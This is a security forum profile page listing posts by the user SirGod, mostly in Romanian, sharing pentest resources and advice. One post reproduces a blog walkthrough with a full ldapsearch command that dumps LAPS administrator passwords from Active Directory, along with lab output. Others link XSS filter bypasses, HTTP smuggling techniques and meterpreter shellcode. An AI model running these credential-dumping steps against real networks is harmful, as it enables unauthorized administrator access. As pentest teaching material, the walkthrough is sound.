Jump to content


  • Content count

  • Joined

  • Last visited

  • Days Won


SirGod last won the day on January 18

SirGod had the most liked content!

Community Reputation

320 Excellent

1 Follower

About SirGod

  • Rank
  • Birthday 06/26/91


  • Location
  1. Author: Soroush Dalili Description: This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks. Slides: https://www.slideshare.net/SoroushDalili/a-forgotten-http-invisibility-cloak
  2. Content Writer

    Țineți cont de profilul forumului cand postați anunțuri. Nu e OLX.
  3. SAML Raider - SAML2 Burp Extension

    Plugin-ul se afla in BApp Store, deci este validat de cei de la Burp. Se poate descarca direct de acolo. Daca nu, sursa este disponibila pentru inspectie. In fine, plugin-ul este foarte OK, te scapa de multa munca manuala.
  4. JWT cracker

    Bun pentru cazurile in care cheia e un string. Daca e cheie RSA, nasol. @TheTime alternativa la cel scris in C#.
  5. Ecran spart Samsung Galaxy Note 3, recuperare date

    Exact cum ti-a zis mai sus. Le poti transfera cu ADB (adb pull /director). https://www.howtogeek.com/125769/how-to-install-and-use-abd-the-android-debug-bridge-utility/
  6. Unde va tineti pozele ?

    Arhiva cu parola (si nu le mai modifica) pe Google Drive, OneDrive, Dropbox sau ce mai vrei tu.
  7. XSS Filters Bypass

    Tutorial pentru bypass filtre XSS, in doua parti (momentan). Primul contine chestii generice (hex, control characters, octal): http://blog.rakeshmane.com/2016/11/xssing-web-part-1.html Aici se concentreaza pe Unicode (UTF-8, UTF-16, UTF-32, BOM) http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html
  8. "inurl: *.site.com" in secolul 21. https://github.com/fathom6/2017-BSidesLV-Modern-Recon/blob/master/Modern Internet Scale Reconnaisance.pdf
  9. Aplicatie android "Transmisii celulare"

    Pare o aplicatie ce iti permite sa configurezi mesajele pe care le poti primi de la operator in caz de alerte. Spre exemplu, in caz de cutremur, se trimite un mesaj (nu SMS) catre toti utilizatorii din zona respectiva. Citeste https://en.wikipedia.org/wiki/Cell_Broadcast Mai poti cauta informatii despre service messages. Daca vrei sa scapi de ea (nu vad de ce), fiind aplicatie proprietara Huawei si inglobata deja in Android-ul lor, nu te ajuta factory reset. Flash-uieste un custom ROM.
  10. PDF-urile pentru prezentarile de la Blackhat 2017: https://media.defcon.org/DEF CON 25/DEF CON 25 presentations/
  11. Aveti aici si articolul aferent exploitului, cu detalii pentru cei interesati: http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
  12. Cineva incearca sa-mi sparga serverul

    Cateva sugestii (nu sunt toate necesare, doar daca esti paranoia): - PermitRootLogin no - Nume utilizator non-standard (evita admin, system etc.) - Port non-standard (poate chiar in range-ul de porturi dinamice) - Fail2Ban - Autentificare SSH cu chei - Firewall (deschide portul SSH doar catre un IP - daca ai IP static) - Autentificare SSH in doi pasi (two-factor auth)
  13. Autor: ROB 'MUBIX' FULLER Sursa: https://room362.com/post/2017/dump-laps-passwords-with-ldapsearch/ If you’ve ever been pentesting an organization that had LAPS, you know that it is the best solution for randomizing local administrator passwords on the planet. (You should just be leaving them disabled). LAPS stores it’s information in Active Directory: The expiration time: ms-Mcs-AdmPwdExpirationTime: 131461867015760024 And the actual password in clear text: ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#( When LAPS first came it, any user in Active Directory could read it. Microsoft fixed that, you now have to have the All extended rights permission to the object or Full Control of it. In many organizations, there are pockets of OU admins, or even standard users that are in charge of a specific set of Users and (in particular) computers in which they have full control over. There is already a Metasploit module thanks to Meatballs: https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/enum_laps.rb. But, unfortunately I don’t always have access to a Meterpreter session to run the module. Using ldapsearch (which is included in the package ldapscripts on Debian/Ubuntu) can be used to make the same query that the module does. Here is an example run: ldapsearch -x -h -D \ "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" \ "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd Lets break this down: -x - Use basic authentication -h - Connect to the Domain Controller for ldap -D "helpdesk" -w ASDqwe123 - Login as the helpdesk user, with the password ASDqwe123 -b "dc=sittingduck,dc=info" - This loads the base LDAP object of the entire domain. "(ms-MCS-AdmPwd=*)" - Filter out any objects that I can’t see a value for ms-MCS-AdmPwd for. (If you have rights as that user to see even one Administrator password, this will show it.) ms-MCS-AdmPwd - Only show me the ms-MCS-AdmPwd object (which by default includes the object name and DN so you will still know what host it belongs to) What does that look like? $ ldapsearch -x -h -D "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd # extended LDIF # # LDAPv3 # base <dc=sittingduck,dc=info> with scope subtree # filter: (ms-MCS-AdmPwd=*) # requesting: ms-MCS-AdmPwd # # DC1, Domain Controllers, sittingduck.info dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info ms-Mcs-AdmPwd: 2F1i/++N0H+G]{Y&,F # SDCLIENT_DAWIN7, LabComputers, Lab, sittingduck.info dn: CN=SDCLIENT_DAWIN7,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info ms-Mcs-AdmPwd: 8CDR4,2UE8BA{zw2@RR # SD_WSUS_2012, LabComputers, Lab, sittingduck.info dn: CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info ms-Mcs-AdmPwd: +3!UY5@g9B.64RV2z/T # WIN-PM0ID6F0AHN, LabComputers, Lab, sittingduck.info dn: CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#( # search reference ref: ldap://research.sittingduck.info/DC=research,DC=sittingduck,DC=info # search reference ref: ldap://ForestDnsZones.sittingduck.info/DC=ForestDnsZones,DC=sittingduck,D C=info # search reference ref: ldap://DomainDnsZones.sittingduck.info/DC=DomainDnsZones,DC=sittingduck,D C=info # search reference ref: ldap://sittingduck.info/CN=Configuration,DC=sittingduck,DC=info # search result search: 2 result: 0 Success Now, just having the local admin password doesn’t ensure that it’s enabled, but there is a good bet that you are good to go now. P.S. You can also authenticate using Kerberos (think Golden/Silver tickets) P.P.S Because Windows doesn’t (to the best of my knowledge) require signing on Domain Controllers for LDAP connections yet (probably does in 2016 or will soon), with a little bit of coding you can get ntlmrelayx to dump LAPS passwords ;-)
  14. Exista si un exemplu mai util, cu shellcode de meterpreter: https://gist.github.com/Arno0x/1862c9ff7e7138fc3d82eeaa5d530cfe
  15. Cei de la Mozilla au facut un audit de securitate pe Firefox Accounts. Auditul a fost facut de Cure53 (da, incluzand pe Mario Heiderich). Detalii: https://blog.mozilla.org/security/2017/07/18/web-service-audits-firefox-accounts/ Raport complet: https://blog.mozilla.org/security/files/2017/07/FXA-01-report.pdf Un raport curat, informativ, vulnerabilitati actuale (pentru cei satui de ../../etc/passwd si order by 5).